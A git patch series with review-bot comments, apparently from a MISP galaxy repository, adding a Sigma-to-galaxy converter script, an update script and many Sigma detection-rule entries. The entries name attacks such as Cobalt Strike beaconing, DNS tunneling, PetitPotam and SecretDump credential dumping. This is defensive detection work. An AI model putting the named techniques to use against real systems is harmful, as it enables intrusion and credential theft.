github + valueData["meta"]["logsource.category"] = jsonData.get("logsource").get( + "category", "No established category" + ) + valueData["meta"]["logsource.product"] = jsonData.get("logsource").get( + "product", "No established product" + ) + return valueData + + +def create_galaxy_json(): + """ + This method creates first the galaxy JSON stored in the path /app/files/misp-galaxy/galaxies + The information of this JSON is basic. + + :return uuidGalaxy: Return the uuid needed for the cluster JSON File which is created after this. + """ + uuidGalaxy = unique_uuid + galaxy = { + "description": "Sigma Rules are used to detect suspicious behaviors related to threat actors, malware and tools", + "icon": "link", + "name": "Sigma-Rules", + "namespace": "misp", + "type": "sigma-rules", + "uuid": uuidGalaxy, + "version": 1, + } + with open("sigma-rules.json", "w") as f: + json.dump(galaxy, f) + + return uuidGalaxy + + +if __name__ == '__main__': + parser = argparse.ArgumentParser( + description="This script can convert your sigma rules in MISP galaxies, generating both files needed for cluster and galaxies. If you need more information about how to import it, please, go to https://github.com/jstnk9/MISP/tree/main/misp-galaxy/sigma" + ) + parser.add_argument( + "-p", + "--path", + dest="inputPath", + required=True, + default="None", + help="Path with your sigma rules.", + ) + parser.add_argument( + "-r", + "--recursive", + dest="recursive", + action="store_true", + help="If you have subfolders on the initial path and you want to convert all of them, use -r to do it recursive.", + ) + args = parser.parse_args() + main(args) diff --git a/tools/sigma/update.sh b/tools/sigma/update.sh new file mode 100644 index 0000000..cbda0de --- /dev/null +++ b/tools/sigma/update.sh @@ -0,0 +1,5 @@ +#!/bin/bash +rm -rf sigma +git clone https://github.com/SigmaHQ/sigma +python3 sigma-to-galaxy.py -r -p ./sigma/rules +cat sigma-cluster.json | jq -S . >../../clusters/sigma-rules.json 
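Review bot: `parseYaml` deserializes third-party YAML with `yaml.load(f, Loader=yaml.FullLoader)`; the rules are read straight from a cloned upstream repository, Sigma rules are plain data, and FullLoader has not been a safe loader for untrusted input in older PyYAML releases, so `jsonData = yaml.safe_load(f)` is the right call here. In `parse_sigma_to_cluster`, `[*set(valueData["meta"]["refs"])]` deduplicates but leaves the order dependent on string hashing, which Python randomizes per process, so every run reshuffles `refs` and produces pure-noise diffs (the ref reorderings in the later `clusters/sigma-rules.json` hunks of PATCH 09 show exactly this); `list(dict.fromkeys(valueData["meta"]["refs"]))` keeps first-seen order. The same function does `jsonData.get("logsource").get(...)`, which raises AttributeError on a rule with no `logsource` block while every other field falls back to a default; `jsonData.get("logsource", {}).get("category", "No established category")` (and likewise for `product`) keeps the fallback consistent. `check_duplicates` only reports duplicate titles, but the value's identity in the cluster is `uuid`, which is copied from the rule's `id` with the non-UUID fallback `"No established id"`; duplicate or missing ids should abort the run before `create_cluster_json` writes the file, and the imported-but-unused `uuid` module can validate them (`uuid.UUID(jsonData["id"])`). Finally, `path.split("rules")[1]` raises IndexError when the path has no `rules` component and splits on the first occurrence anywhere in the path, so a checkout under a directory whose name contains "rules" yields a wrong ref URL; `os.path.relpath(dirpath, pathsigma)` gives the intended suffix directly.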
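Review bot: `update.sh` sets no error handling, so if `git clone` fails after `rm -rf sigma` the script still runs the generator against a missing `./sigma/rules`, which produces an empty cluster that `jq` then writes over `../../clusters/sigma-rules.json`; add `set -euo pipefail` directly after the shebang. The clone is also unpinned, each run takes whatever is on the upstream default branch and nothing in the generated cluster records which commit it came from, so a regenerated file cannot be traced to its source or reproduced; consider `git clone --depth 1 https://github.com/SigmaHQ/sigma` and capturing `git -C sigma rev-parse HEAD` into the commit message or a cluster meta field. `cat sigma-cluster.json | jq -S .` can simply be `jq -S . sigma-cluster.json`.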
From e54366fb8736484066698536ba4084358c9449c5 Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Tue, 10 Jan 2023 15:55:30 +0100 Subject: [PATCH 08/13] chg: [threat-actor] added the missing synonyms --- clusters/threat-actor.json | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index 2c01817..972a6b9 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -8677,7 +8677,13 @@ "meta": { "refs": [ "https://www.rewterz.com/rewterz-news/rewterz-threat-alert-common-raven-iocs", - "https://www2.swift.com/isac/report/10118" + "https://www2.swift.com/isac/report/10118", + "https://blog.group-ib.com/opera1er-apt" + ], + "synonyms": [ + "OPERA1ER", + "NXSMS", + "DESKTOP-GROUP" ] }, "uuid": "da581c60-7c3d-4de6-b54c-cafea1c58389", @@ -9986,5 +9992,5 @@ "value": "Malteiro" } ], - "version": 256 + "version": 257 } From c0fdfb0e997cef645507b9c8239395ed5b47e41d Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Thu, 12 Jan 2023 13:46:31 +0100 Subject: [PATCH 09/13] chg: [sigma] updated with latest version + new relationship script --- clusters/sigma-rules.json | 22614 ++++++++++++++++++++++++++++++++---- 1 file changed, 20669 insertions(+), 1945 deletions(-) diff --git a/clusters/sigma-rules.json b/clusters/sigma-rules.json index ffc3f22..9954344 100644 --- a/clusters/sigma-rules.json +++ b/clusters/sigma-rules.json 
@@ -9,6 +9,37 @@ "type": "sigma-rules", "uuid": "9cf7cd2e-d5f1-48c4-9909-7896ba1c96b2", "values": [ + { + "description": "Detects juniper BGP missing MD5 digest. Which may be indicative of brute force attacks to manipulate routing.", + "meta": { + "author": "Tim Brown", + "creation_date": "2023/01/09", + "falsepositive": [ + "Unlikely. Except due to misconfigurations" + ], + "filename": "juniper_bgp_missing_md5.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "juniper", + "refs": [ + "https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/juniper/bgp/juniper_bgp_missing_md5.yml" + ], + "tags": [ + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.credential_access", + "attack.collection", + "attack.t1078", + "attack.t1110", + "attack.t1557" + ] + }, + "uuid": "a7c0ae48-8df8-42bf-91bd-2ea57e2f9d43", + "value": "Juniper BGP Missing MD5" + }, { "description": "Detects many failed connection attempts to different ports or hosts", "meta": { @@ -55,6 +86,22 @@ "attack.t1071.004" ] }, + "related": [ + { + "dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "51186749-7415-46be-90e5-6914865c825a", "value": "High DNS Requests Rate - Firewall" }, @@ -102,6 +149,15 @@ "attack.t1048.003" ] }, + "related": [ + { + "dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3b6e327d-8649-4102-993f-d25786481589", "value": "High DNS Bytes Out - Firewall" }, 
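Review bot: The `related` arrays added from the `High DNS Requests Rate - Firewall` entry onward (and throughout the following hunks of this file) come from the "new relationship script" named in the commit subject, but the diffstat lists only `clusters/sigma-rules.json`, so the script that maps the `attack.tNNNN` tags to `dest-uuid`s is not in the tree and the output can be neither regenerated nor reviewed; it should be committed under `tools/sigma/` next to `sigma-to-galaxy.py` and invoked from `update.sh`. Every relationship carries `estimative-language:likelihood-probability="almost-certain"` with `type: related-to`, which is a strong default if, as it appears, the links are derived mechanically from the rule tags; a short note in the generator (or the galaxy description) stating that the confidence is fixed rather than assessed would let consumers weigh it correctly.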
@@ -118,8 +174,8 @@ "logsource.category": "firewall", "logsource.product": "No established product", "refs": [ - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.cisecurity.org/controls/cis-controls-list/", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_cleartext_protocols.yml" ], @@ -141,8 +197,8 @@ "logsource.category": "firewall", "logsource.product": "No established product", "refs": [ - "https://medium.com/@msuiche/the-nsa-compromised-swift-network-50ec3000b195", "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation", + "https://medium.com/@msuiche/the-nsa-compromised-swift-network-50ec3000b195", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_apt_equationgroup_c2.yml" ], "tags": [ @@ -151,6 +207,15 @@ "attack.t1041" ] }, + "related": [ + { + "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "881834a4-6659-4773-821e-1c151789d873", "value": "Equation Group C2 Communication" }, 
@@ -167,10 +232,10 @@ "logsource.category": "dns", "logsource.product": "No established product", "refs": [ - "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", - "https://core.telegram.org/bots/faq", + "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", + "https://core.telegram.org/bots/faq", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_telegram_api.yml" ], "tags": [ @@ -178,6 +243,15 @@ "attack.t1102.002" ] }, + "related": [ + { + "dest-uuid": "be055942-6e63-49d7-9fa1-9cb7d8a8f3f4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c64c5175-5189-431b-a55e-6d9882158251", "value": "Telegram Bot API Request" }, @@ -204,6 +278,22 @@ "attack.t1595.002" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "5502c4e9-24ef-4d5f-8ee9-9e906c2f82c4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "aff715fa-4dd5-497a-8db3-910bea555566", "value": "DNS Query to External Service Interaction Domains" }, @@ -229,6 +319,15 @@ "attack.t1071.004" ] }, + "related": [ + { + "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2975af79-28c4-4d2f-a951-9095f229df29", "value": "Cobalt Strike DNS Beaconing" }, 
@@ -252,6 +351,15 @@ "attack.t1048.003" ] }, + "related": [ + { + "dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0f6c1bf5-70a5-4963-aef9-aab1eefb50bd", "value": "High DNS Bytes Out" }, @@ -277,6 +385,22 @@ "attack.t1071.004" ] }, + "related": [ + { + "dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "44ae5117-9c44-40cf-9c7c-7edad385ca70", "value": "High NULL Records Requests Rate" }, @@ -293,8 +417,8 @@ "logsource.category": "dns", "logsource.product": "No established product", "refs": [ - "https://zeltser.com/c2-dns-tunneling/", "https://patrick-bareiss.com/detect-c2-traffic-over-dns-using-sigma/", + "https://zeltser.com/c2-dns-tunneling/", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_c2_detection.yml" ], "tags": [ @@ -304,6 +428,22 @@ "attack.t1048.003" ] }, + "related": [ + { + "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1ec4b281-aa65-46a2-bdae-5fd830ed914e", "value": "Possible DNS Tunneling" }, 
@@ -329,6 +469,15 @@ "attack.t1071.004" ] }, + "related": [ + { + "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8ae51330-899c-4641-8125-e39f2e07da72", "value": "DNS TXT Answer with Possible Execution Strings" }, @@ -354,6 +503,22 @@ "attack.t1071.004" ] }, + "related": [ + { + "dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f0a8cedc-1d22-4453-9c44-8d9f4ebd5d35", "value": "High TXT Records Requests Rate" }, @@ -380,6 +545,22 @@ "attack.t1071.004" ] }, + "related": [ + { + "dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4153a907-2451-4e4f-a578-c52bb6881432", "value": "Suspicious DNS Query with B64 Encoded String" }, @@ -405,6 +586,22 @@ "attack.t1071.004" ] }, + "related": [ + { + "dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b4163085-4001-46a3-a79a-55d8bbbc7a3a", "value": "High DNS Requests Rate" }, 
@@ -429,6 +626,15 @@ "attack.t1071.001" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3eaf6218-3bed-4d8a-8707-274096f12a18", "value": "Wannacry Killswitch Domain" }, @@ -454,6 +660,22 @@ "attack.t1567" ] }, + "related": [ + { + "dest-uuid": "cd25c1b4-935c-4f0e-ba8d-552f28bc4783", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "40597f16-0963-4249-bf4c-ac93b7fb9807", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b593fd50-7335-4682-a36c-4edcb68e4641", "value": "Monero Crypto Coin Mining Pool Lookup" }, @@ -485,6 +707,22 @@ "attack.t1124" ] }, + "related": [ + { + "dest-uuid": "b6075259-dba3-44e9-87c7-e954f37ec0d5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9705a6a1-6db6-4a16-a987-15b7151e299b", "value": "Cisco Discovery" }, @@ -512,6 +750,29 @@ "attack.t1053" ] }, + "related": [ + { + "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "d456de47-a16f-4e46-8980-e67478a12dcb", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "d0613359-5781-4fd2-b5be-c269270be1f6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "671ffc77-50a7-464f-9e3d-9ea2b493b26b", "value": "Cisco Modify Configuration" }, 
@@ -538,6 +799,29 @@ "attack.t1561.002" ] }, + "related": [ + { + "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "fb640c43-aa6b-431e-a961-a279010424ac", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "0af0ca99-357d-4ba1-805f-674fdfb7bef9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "71d65515-c436-43c0-841b-236b1f32c21e", "value": "Cisco File Deletion" }, @@ -566,6 +850,29 @@ "attack.t1560.001" ] }, + "related": [ + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5e51acb2-bcbe-435b-99c6-0e3cd5e2aa59", "value": "Cisco Stage Data" }, @@ -589,6 +896,15 @@ "attack.t1552.003" ] }, + "related": [ + { + "dest-uuid": "8187bd2a-866f-4457-9009-86b0ddedffa3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b094d9fb-b1ad-4650-9f1a-fb7be9f1d34b", "value": "Cisco Show Commands Input" }, 
@@ -616,6 +932,22 @@ "attack.t1005" ] }, + "related": [ + { + "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cd072b25-a418-4f98-8ebc-5093fb38fe1a", "value": "Cisco Collect Data" }, @@ -664,6 +996,29 @@ "attack.t1565.001" ] }, + "related": [ + { + "dest-uuid": "f5bb433e-bdf6-4781-84bc-35e97e43be89", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "ff73aa03-0090-4464-83ac-f89e233c02bc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1cfcb312-b8d7-47a4-b560-4b16cc677292", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d94a35f0-7a29-45f6-90a0-80df6159967c", "value": "Cisco Denial of Service" }, @@ -712,6 +1067,22 @@ "attack.t1098" ] }, + "related": [ + { + "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6d844f0f-1c18-41af-8f19-33e7654edfc3", "value": "Cisco Local Accounts" }, @@ -737,6 +1108,15 @@ "attack.t1552.004" ] }, + "related": [ + { + "dest-uuid": "60b508a1-6a5e-46b1-821a-9f7b78752abf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1f978c6a-4415-47fb-aca5-736a44d7ca3d", "value": "Cisco Crypto Commands" }, 
@@ -760,9 +1140,111 @@ "attack.t1070.003" ] }, + "related": [ + { + "dest-uuid": "3aef9463-9a7a-43ba-8957-a867e07c1e6a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ceb407f6-8277-439b-951f-e4210e3ed956", "value": "Cisco Clear Logs" }, + { + "description": "Detects LDP failures which may be indicative of brute force attacks to manipulate MPLS labels", + "meta": { + "author": "Tim Brown", + "creation_date": "2023/01/09", + "falsepositive": [ + "Unlikely. Except due to misconfigurations" + ], + "filename": "cisco_ldp_md5_auth_failed.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "cisco", + "refs": [ + "https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/ldp/cisco_ldp_md5_auth_failed.yml" + ], + "tags": [ + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.credential_access", + "attack.collection", + "attack.t1078", + "attack.t1110", + "attack.t1557" + ] + }, + "uuid": "50e606bf-04ce-4ca7-9d54-3449494bbd4b", + "value": "Cisco LDP Authentication Failures" + }, + { + "description": "Detects BGP failures which may be indicative of brute force attacks to manipulate routing", + "meta": { + "author": "Tim Brown", + "creation_date": "2023/01/09", + "falsepositive": [ + "Unlikely. 
Except due to misconfigurations" + ], + "filename": "cisco_bgp_md5_auth_failed.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "cisco", + "refs": [ + "https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/bgp/cisco_bgp_md5_auth_failed.yml" + ], + "tags": [ + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.credential_access", + "attack.collection", + "attack.t1078", + "attack.t1110", + "attack.t1557" + ] + }, + "uuid": "56fa3cd6-f8d6-4520-a8c7-607292971886", + "value": "Cisco BGP Authentication Failures" + }, + { + "description": "Detects BGP failures which may be indicative of brute force attacks to manipulate routing.", + "meta": { + "author": "Tim Brown", + "creation_date": "2023/01/09", + "falsepositive": [ + "Unlikely. Except due to misconfigurations" + ], + "filename": "huawei_bgp_auth_failed.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "huawei", + "refs": [ + "https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/huawei/bgp/huawei_bgp_auth_failed.yml" + ], + "tags": [ + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.credential_access", + "attack.collection", + "attack.t1078", + "attack.t1110", + "attack.t1557" + ] + }, + "uuid": "a557ffe6-ac54-43d2-ae69-158027082350", + "value": "Huawei BGP Authentication Failures" + }, { "description": "Detects the presence of default Cobalt Strike certificate in the HTTPS traffic", "meta": { 
@@ -847,10 +1329,10 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ - "https://msrc.microsoft.com/update-guide/vulnerability/ADV210003", - "https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf", "https://github.com/topotam/PetitPotam/blob/d83ac8f2dd34654628c17490f99106eb128e7d1e/PetitPotam/PetitPotam.cpp", "https://threatpost.com/microsoft-petitpotam-poc/168163/", + "https://msrc.microsoft.com/update-guide/vulnerability/ADV210003", + "https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml" ], "tags": [ @@ -858,6 +1340,22 @@ "attack.t1187" ] }, + "related": [ + { + "dest-uuid": "650c784b-7504-4df7-ab2c-4ea882384d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b77cf5f3-6060-475d-bd60-40ccbf28fdc2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4096842a-8f9f-4d36-92b4-d0b2a62f9b2a", "value": "Potential PetitPotam Attack Via EFS RPC Calls" }, @@ -882,6 +1380,15 @@ "attack.t1048.003" ] }, + "related": [ + { + "dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "705072a5-bb6f-4ced-95b6-ecfa6602090b", "value": "WebDav Put Request" }, @@ -909,6 +1416,15 @@ "attack.t1053.002" ] }, + "related": [ + { + "dest-uuid": "f3d95a1f-bba2-44ce-9af7-37866cd63fd0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "dde85b37-40cd-4a94-b00c-0b8794f956b5", "value": "Remote Task Creation via ATSVC Named Pipe - Zeek" }, 
@@ -934,6 +1450,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "aac2fd97-bcba-491b-ad66-a6edf89c71bf", "value": "Executable from Webdav" }, @@ -957,6 +1482,15 @@ "attack.t1048" ] }, + "related": [ + { + "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a8322756-015c-42e7-afb1-436e85ed3ff5", "value": "DNS TOR Proxies" }, @@ -990,6 +1524,43 @@ "attack.t1210" ] }, + "related": [ + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ab6b1a39-a9ee-4ab4-b075-e83acf6e346b", "value": "OMIGOD HTTP No Authentication RCE" }, 
@@ -1017,6 +1588,29 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f3d95a1f-bba2-44ce-9af7-37866cd63fd0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b640c0b8-87f8-4daa-aef8-95a24261dd1d", "value": "MITRE BZAR Indicators for Execution" }, @@ -1043,6 +1637,29 @@ "attack.t1003.003" ] }, + "related": [ + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "92dae1ed-1c9d-4eff-a567-33acbd95b00e", "value": "Possible Impacket SecretDump Remote Activity - Zeek" }, @@ -1083,8 +1700,8 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ - "https://github.com/nknorg/nkn-sdk-go", "https://github.com/Maka8ka/NGLite", + "https://github.com/nknorg/nkn-sdk-go", "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_nkn.yml" ], 
